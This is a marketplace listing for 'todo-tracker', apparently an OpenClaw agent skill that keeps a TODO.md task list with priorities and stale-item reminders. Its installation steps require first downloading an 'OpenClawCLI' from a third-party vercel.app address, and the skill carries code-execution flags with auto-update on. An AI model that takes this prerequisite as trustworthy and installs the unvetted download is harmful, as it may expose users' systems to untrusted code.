todo-tracker
Persistent TODO scratch pad for tracking tasks across sessions. Use when user says "add to TODO", "what's on the TODO", "mark X done", "show TODO list", "remove from TODO", or asks about pending tasks. Also triggers on heartbeat to remind about stale items.
Why use this skill?
Efficiently manage tasks and project reminders with the todo-tracker skill for OpenClaw. Track high-priority items and clear stale tasks easily.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/thiagoruss0/todo-tracker1What This Skill Does
The todo-tracker skill acts as a persistent memory layer for your OpenClaw agent, maintaining a structured TODO.md file directly in your workspace root. Unlike transient chat memory, this skill ensures that tasks, reminders, and project requirements are tracked across long-term sessions. It manages task prioritization, tracks completion status, and performs automated health checks to identify stale items, ensuring that important project goals do not fall through the cracks over time.
Installation
⚠️ OpenClawCLI must be installed before using this skill.
- Ensure you have the OpenClawCLI installed from https://openclawcli.vercel.app/.
- Open your terminal in the workspace directory.
- Run the installation command:
clawhub install openclaw/skills/skills/thiagoruss0/todo-tracker1
Use Cases
This skill is designed for developers and power users who need to bridge the gap between AI conversation and project execution. Use it to keep track of technical bugs, pending refactors, or documentation updates. It is particularly useful for managing long-term projects where context is often lost between chat sessions, allowing the agent to provide timely reminders based on your predefined priority levels (high, medium, low).
Example Prompts
- "Add high priority task: Refactor the authentication middleware to support OIDC before Friday."
- "What is currently on my TODO list? I want to see if I have anything stale that I can remove."
- "Mark 'Ingest low-code docs' as done and show me my remaining tasks."
Tips & Limitations
- Stale Item Management: The skill automatically marks items older than 7 days as stale in the summary. Review these regularly to keep your workspace clean.
- File Integrity: The todo-tracker relies on the
TODO.mdfile in your workspace root. Avoid manually renaming or deleting this file outside of the skill's commands to prevent sync issues. - Pattern Matching: The 'done' and 'remove' commands use partial string matching. Use specific keywords to ensure you are modifying the correct entry.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-thiagoruss0-todo-tracker1": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-read, file-write, code-execution
Related Skills
seo-optimizer
This skill should be used when analyzing HTML/CSS websites for SEO optimization, fixing SEO issues, generating SEO reports, or implementing SEO best practices. Use when the user requests SEO audits, optimization, meta tag improvements, schema markup implementation, sitemap generation, or general search engine optimization tasks.
deep-research
Deep Research Agent specializes in complex, multi-step research tasks that require planning, decomposition, and long-context reasoning across tools and files by we-crafted.com/agents/deep-research
bear-notes
Create, search, and manage Bear notes via grizzly CLI.
tavily-web-search
AI-optimized web search via Tavily API. Returns concise, relevant results for AI agents.
coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.